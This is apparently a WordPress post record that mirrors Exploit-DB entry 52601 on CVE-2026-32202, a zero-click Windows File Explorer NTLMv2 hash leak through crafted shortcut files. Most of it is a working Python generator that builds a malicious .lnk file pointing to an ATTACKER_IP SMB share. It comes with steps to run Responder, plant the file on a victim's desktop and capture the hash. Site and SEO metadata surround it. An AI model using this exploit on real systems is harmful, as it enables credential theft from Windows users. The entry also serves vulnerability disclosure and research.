{"id":58041,"date":"2026-05-29T06:35:13","date_gmt":"2026-05-29T06:35:13","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=58041"},"modified":"2026-05-29T06:35:13","modified_gmt":"2026-05-29T06:35:13","slug":"microsoft-ntlmv2-hash-capture","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=58041","title":{"rendered":"Microsoft &#8211; NTLMv2 Hash Capture_EDB-ID:52601"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-29T11:29:17&#8243;,&#8221;description&#8221;:&#8221;Titles: Microsoft &#8211; NTLMv2 Hash Capture Author: nu11secur1ty Date: 2026-05-27 Vendor: Microsoft Software: Windows Shell File Explorer Reference: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-32202 Description: A spoofing vulnerability in Windows Shell File&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;Microsoft &#8211; NTLMv2 Hash Capture&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;EDB-ID:52601&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-32202&#8243;],&#8221;sourceData&#8221;:&#8221;# Titles: Microsoft &#8211; NTLMv2 Hash Capture\\r\\n# Author: nu11secur1ty\\r\\n# Date: 2026-05-27\\r\\n# Vendor: Microsoft\\r\\n# Software: Windows Shell (File Explorer)\\r\\n# Reference: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-32202\\r\\n\\r\\n## Description:\\r\\nA spoofing vulnerability in Windows Shell (File Explorer) allows an\\r\\nattacker to capture NTLMv2 hashes without user interaction. By crafting a\\r\\nmalicious .lnk (shortcut) file with a UNC path pointing to an\\r\\nattacker-controlled SMB server, the target&#8217;s Windows system automatically\\r\\nsends an NTLMv2 authentication request when the folder containing the .lnk\\r\\nfile is opened. No click on the shortcut is required \u2013 simply viewing the\\r\\nfolder triggers the vulnerability.\\r\\n\\r\\n**CVSS**: 4.3 (Medium) \u2013 NetNTLMv2 hash leak\\r\\n**Attack Vector**: Network (SMB)\\r\\n**Privileges Required**: None (user only needs to open a folder)\\r\\n**User Interaction**: None (zero-click)\\r\\n\\r\\n**Affected Versions**:\\r\\n- Windows 11 23H2, 24H2, 25H2, 26H1\\r\\n- Windows 10 21H2-22H2\\r\\n- Windows Server 2019\/2022\/2025\\r\\n\\r\\n**Patch**: Microsoft April 2026 Patch Tuesday (KB2026-04214)\\r\\n\\r\\nSTATUS: MEDIUM &#8211; HIGH\/ Vulnerability\\r\\n\\r\\n[+]Payload:\\r\\n\\r\\n&#8220;`POST\\r\\nSMB\/CIFS NTLMv2 Authentication Request\\r\\nUNC Path: \\\\\\\\ATTACKER_IP\\\\share\\\\payload.dll\\r\\nProtocol: SMB2 (port 445)\\r\\nHash Type: NetNTLMv2\\r\\n&#8220;`\\r\\n[+]Exploit:\\r\\n\\r\\n&#8220;`\\r\\n#!\/usr\/bin\/env python3\\r\\n\\&#8221;\\&#8221;\\&#8221;\\r\\nCVE-2026-32202 LNK Exploit Generator\\r\\nAuthor: nu11secur1ty\\r\\nGenerates LNK file that leaks NTLM hash to Responder\/Impacket\\r\\n\\&#8221;\\&#8221;\\&#8221;\\r\\n\\r\\nimport struct\\r\\nimport sys\\r\\nimport os\\r\\n\\r\\ndef create_malicious_lnk(attacker_ip, output_file=\\&#8221;exploit.lnk\\&#8221;,\\r\\nshare_name=\\&#8221;share\\&#8221;):\\r\\n    \\&#8221;\\&#8221;\\&#8221;\\r\\n    Creates LNK file with UNC path to attacker machine\\r\\n    \\&#8221;\\&#8221;\\&#8221;\\r\\n\\r\\n    unc_path = f\\&#8221;\\\\\\\\\\\\\\\\{attacker_ip}\\\\\\\\{share_name}\\\\\\\\test\\&#8221;\\r\\n    unc_utf16 = unc_path.encode(&#8216;utf-16le&#8217;) + b&#8217;\\\\x00\\\\x00&#8217;\\r\\n\\r\\n    # LNK structure (standard + vulnerable component)\\r\\n    lnk = bytearray()\\r\\n\\r\\n    # ===== HEADER (76 bytes) =====\\r\\n    lnk.extend(struct.pack(&#8216;\\u003cI&#8217;, 0x0000004C))  # HeaderSize\\r\\n    # LinkCLSID: {00021401-0000-0000-C000-000000000046}\\r\\n\\r\\nlnk.extend(b&#8217;\\\\x01\\\\x14\\\\x02\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x46&#8242;)\\r\\n    lnk.extend(struct.pack(&#8216;\\u003cI&#8217;, 0x000002A3))  # LinkFlags\\r\\n(HasName|HasWorkingDir|HasArguments|IsUnicode)\\r\\n    lnk.extend(struct.pack(&#8216;\\u003cI&#8217;, 0x00000080))  # FileAttributes (NORMAL)\\r\\n    lnk.extend(struct.pack(&#8216;\\u003cQ&#8217;, 0))           # CreationTime\\r\\n    lnk.extend(struct.pack(&#8216;\\u003cQ&#8217;, 0))           # AccessTime\\r\\n    lnk.extend(struct.pack(&#8216;\\u003cQ&#8217;, 0))           # WriteTime\\r\\n    lnk.extend(struct.pack(&#8216;\\u003cI&#8217;, 0x00001000))  # FileSize\\r\\n    lnk.extend(struct.pack(&#8216;\\u003cI&#8217;, 0x00000000))  # IconIndex\\r\\n    lnk.extend(struct.pack(&#8216;\\u003cI&#8217;, 0x00000001))  # ShowCommand (SW_NORMAL)\\r\\n    lnk.extend(struct.pack(&#8216;\\u003cH&#8217;, 0x0000))      # Hotkey\\r\\n    lnk.extend(b&#8217;\\\\x00\\\\x00&#8242;)                    # Reserved\\r\\n    lnk.extend(b&#8217;\\\\x00\\\\x00\\\\x00\\\\x00&#8242;)            # Reserved2\\r\\n    lnk.extend(b&#8217;\\\\x00\\\\x00\\\\x00\\\\x00&#8242;)            # Reserved3\\r\\n\\r\\n    # ===== IDLIST (activates when folder is opened) =====\\r\\n    # Shell Folder IDITEM\\r\\n    lnk.extend(b&#8217;\\\\x14\\\\x00&#8242;)                    # ItemID size (20 bytes)\\r\\n\\r\\nlnk.extend(b&#8217;\\\\x2e\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00&#8242;)\\r\\n    lnk.extend(b&#8217;\\\\x00\\\\x00&#8242;)                    # Terminating ID\\r\\n\\r\\n    # ===== STRING DATA (CRITICAL FOR EXPLOIT) =====\\r\\n    # NameString (UNC path &#8211; triggers NTLM hash leak)\\r\\n    lnk.extend(struct.pack(&#8216;\\u003cH&#8217;, len(unc_utf16)))\\r\\n    lnk.extend(unc_utf16)\\r\\n\\r\\n    # ArgumentsString (empty)\\r\\n    lnk.extend(b&#8217;\\\\x00\\\\x00&#8242;)\\r\\n\\r\\n    # WorkingDir (UNC path again)\\r\\n    lnk.extend(struct.pack(&#8216;\\u003cH&#8217;, len(unc_utf16)))\\r\\n    lnk.extend(unc_utf16)\\r\\n\\r\\n    # ===== Console Properties (required for some Windows versions) =====\\r\\n    lnk.extend(b&#8217;\\\\x50\\\\x00\\\\x14\\\\x00&#8242;)           # dwWindowSize (80&#215;20)\\r\\n    lnk.extend(b&#8217;\\\\x50\\\\x00\\\\xfa\\\\x00&#8242;)           # dwBufferSize (80&#215;250)\\r\\n    lnk.extend(b&#8217;\\\\x00\\\\x00\\\\x00\\\\x00&#8242;)           # dwFontSize\\r\\n    lnk.extend(b&#8217;\\\\x00\\\\x00\\\\x00\\\\x00&#8242;)           # dwFontFamily\\r\\n    lnk.extend(b&#8217;\\\\x00\\\\x00\\\\x00\\\\x00&#8242;)           # dwFaceNameLen\\r\\n    lnk.extend(b&#8217;\\\\x00\\\\x00\\\\x00\\\\x00&#8242;)           # dwFaceNameOffset\\r\\n    lnk.extend(b&#8217;\\\\x00\\\\x00\\\\x00\\\\x00&#8242;)           # dwStyle\\r\\n    # 64 bytes padding\\r\\n    lnk.extend(b&#8217;\\\\x00&#8242; * 64)\\r\\n\\r\\n    # Save the file\\r\\n    with open(output_file, &#8216;wb&#8217;) as f:\\r\\n        f.write(lnk)\\r\\n\\r\\n    return output_file, unc_path\\r\\n\\r\\ndef main():\\r\\n    print(r\\&#8221;\\&#8221;\\&#8221;\\r\\n    \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\r\\n    \u2551  CVE-2026-32202 &#8211; LNK Generator           \u2551\\r\\n    \u2551  Author: nu11secur1ty                     \u2551\\r\\n    \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\r\\n    \\&#8221;\\&#8221;\\&#8221;)\\r\\n\\r\\n    if len(sys.argv) \\u003c 2:\\r\\n        print(\\&#8221;Usage: python3 cve_2026_32202_gen.py \\u003cATTACKER_IP\\u003e\\r\\n[output_file]\\&#8221;)\\r\\n        print(\\&#8221;Example: python3 cve_2026_32202_gen.py 192.168.1.100\\r\\ninvoice.lnk\\&#8221;)\\r\\n        sys.exit(1)\\r\\n\\r\\n    attacker_ip = sys.argv[1]\\r\\n    output_file = sys.argv[2] if len(sys.argv) \\u003e 2 else \\&#8221;exploit.lnk\\&#8221;\\r\\n\\r\\n    lnk_file, unc_path = create_malicious_lnk(attacker_ip, output_file)\\r\\n\\r\\n    print(f\\&#8221;[+] Exploit ready!\\&#8221;)\\r\\n    print(f\\&#8221;[+] File: {lnk_file}\\&#8221;)\\r\\n    print(f\\&#8221;[+] UNC path: {unc_path}\\&#8221;)\\r\\n    print()\\r\\n    print(\\&#8221;[*] Next steps:\\&#8221;)\\r\\n    print(f\\&#8221;    1. Start Responder: sudo responder -I eth0 -v\\&#8221;)\\r\\n    print(f\\&#8221;    2. Transfer {lnk_file} to Windows 11 Desktop\\&#8221;)\\r\\n    print(f\\&#8221;    3. Open Desktop in File Explorer (no click required)\\&#8221;)\\r\\n    print(f\\&#8221;    4. Watch Responder &#8211; NTLM hash will appear\\&#8221;)\\r\\n    print()\\r\\n\\r\\n    with open(\\&#8221;start_responder.sh\\&#8221;, \\&#8221;w\\&#8221;) as f:\\r\\n        f.write(\\&#8221;#!\/bin\/bash\\\\n\\&#8221;)\\r\\n        f.write(\\&#8221;echo \\\\\\&#8221;[+] Starting Responder&#8230;\\\\\\&#8221;\\\\n\\&#8221;)\\r\\n        f.write(\\&#8221;sudo responder -I eth0 -v\\\\n\\&#8221;)\\r\\n    os.chmod(\\&#8221;start_responder.sh\\&#8221;, 0o755)\\r\\n    print(\\&#8221;[+] Helper script created: start_responder.sh\\&#8221;)\\r\\n\\r\\nif __name__ == \\&#8221;__main__\\&#8221;:\\r\\n    main()\\r\\n&#8220;`\\r\\n\\r\\n\\r\\nDemo:\\r\\n[href](https:\/\/www.patreon.com\/posts\/cve-2026-32202-159362448)\\r\\n\\r\\nCode:\\r\\n[code](\\r\\nhttps:\/\/github.com\/nu11secur1ty\/CVE-mitre\/tree\/main\/2026\/CVE-2026-32202)\\r\\n\\r\\nTime spent:\\r\\n02:30:00\\r\\n\\r\\n&#8211;\\r\\nSystem Administrator &#8211; Infrastructure Engineer\\r\\nPenetration Testing Engineer\\r\\nExploit developer at https:\/\/packetstormsecurity.com\/\\r\\nhttps:\/\/cve.mitre.org\/index.html\\r\\nhttps:\/\/cxsecurity.com\/ and https:\/\/www.exploit-db.com\/\\r\\nhome page: https:\/\/www.asc3t1c-nu11secur1ty.com\/\\r\\nhiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=\\r\\nnu11secur1ty https:\/\/www.asc3t1c-nu11secur1ty.com\/\\r\\n\\r\\nOn Wed, May 27, 2026 at 2:06\u202fPM Offsec Exploits \\u003c\\r\\nsubmit@offensive-security.com\\u003e wrote:\\r\\n\\r\\n\\u003e Hello,\\r\\n\\u003e\\r\\n\\u003e Thank you for your submission.\\r\\n\\u003e We will be checking it shortly.\\r\\n\\u003e\\r\\n\\u003e Regards\\r\\n\\u003e &#8211; Exploit-DB Team\\r\\n\\u003e\\r\\n\\r\\n\\r\\n&#8211; \\r\\n\\r\\nSystem Administrator &#8211; Infrastructure Engineer\\r\\nPenetration Testing Engineer\\r\\nExploit developer at https:\/\/packetstorm.news\/\\r\\nhttps:\/\/cve.mitre.org\/index.html\\r\\nhttps:\/\/cxsecurity.com\/ and https:\/\/www.exploit-db.com\/\\r\\n0day Exploit DataBase https:\/\/0day.today\/\\r\\nhome page: https:\/\/www.asc3t1c-nu11secur1ty.com\/\\r\\nhiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=\\r\\n                          nu11secur1ty \\u003chttp:\/\/nu11secur1ty.com\/\\u003e&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/www.exploit-db.com\/raw\/52601&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:4.3,&#8221;severity&#8221;:&#8221;MEDIUM&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:L\/I:N\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.exploit-db.com\/exploits\/52601&#8243;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-29T11:29:17&#8243;,&#8221;description&#8221;:&#8221;Titles: Microsoft &#8211; NTLMv2 Hash Capture Author: nu11secur1ty Date: 2026-05-27 Vendor: Microsoft Software: Windows Shell File Explorer Reference: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-32202 Description: A spoofing vulnerability in Windows&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,123,12,40,21,13,7,11,5],"class_list":["post-58041","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-43","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Microsoft - NTLMv2 Hash Capture_EDB-ID:52601 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=58041\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Microsoft - NTLMv2 Hash Capture_EDB-ID:52601 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-29T11:29:17&#8243;,&#8221;description&#8221;:&#8221;Titles: Microsoft &#8211; NTLMv2 Hash Capture Author: nu11secur1ty Date: 2026-05-27 Vendor: Microsoft Software: Windows Shell File Explorer Reference: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-32202 Description: A spoofing vulnerability in Windows...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=58041\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-29T06:35:13+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58041#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58041\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Microsoft &#8211; NTLMv2 Hash Capture_EDB-ID:52601\",\"datePublished\":\"2026-05-29T06:35:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58041\"},\"wordCount\":1447,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-4.3\",\"exploit\",\"exploitdb\",\"MEDIUM\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=58041#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58041\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58041\",\"name\":\"Microsoft - NTLMv2 Hash Capture_EDB-ID:52601 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-29T06:35:13+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58041#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=58041\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58041#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Microsoft &#8211; NTLMv2 Hash Capture_EDB-ID:52601\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Microsoft - NTLMv2 Hash Capture_EDB-ID:52601 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=58041","og_locale":"en_US","og_type":"article","og_title":"Microsoft - NTLMv2 Hash Capture_EDB-ID:52601 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-29T11:29:17&#8243;,&#8221;description&#8221;:&#8221;Titles: Microsoft &#8211; NTLMv2 Hash Capture Author: nu11secur1ty Date: 2026-05-27 Vendor: Microsoft Software: Windows Shell File Explorer Reference: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-32202 Description: A spoofing vulnerability in Windows...","og_url":"https:\/\/zero.redgem.net\/?p=58041","og_site_name":"zero redgem","article_published_time":"2026-05-29T06:35:13+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=58041#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=58041"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Microsoft &#8211; NTLMv2 Hash Capture_EDB-ID:52601","datePublished":"2026-05-29T06:35:13+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=58041"},"wordCount":1447,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-4.3","exploit","exploitdb","MEDIUM","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=58041#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=58041","url":"https:\/\/zero.redgem.net\/?p=58041","name":"Microsoft - NTLMv2 Hash Capture_EDB-ID:52601 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-29T06:35:13+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=58041#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=58041"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=58041#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Microsoft &#8211; NTLMv2 Hash Capture_EDB-ID:52601"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/58041","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=58041"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/58041\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=58041"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=58041"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=58041"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}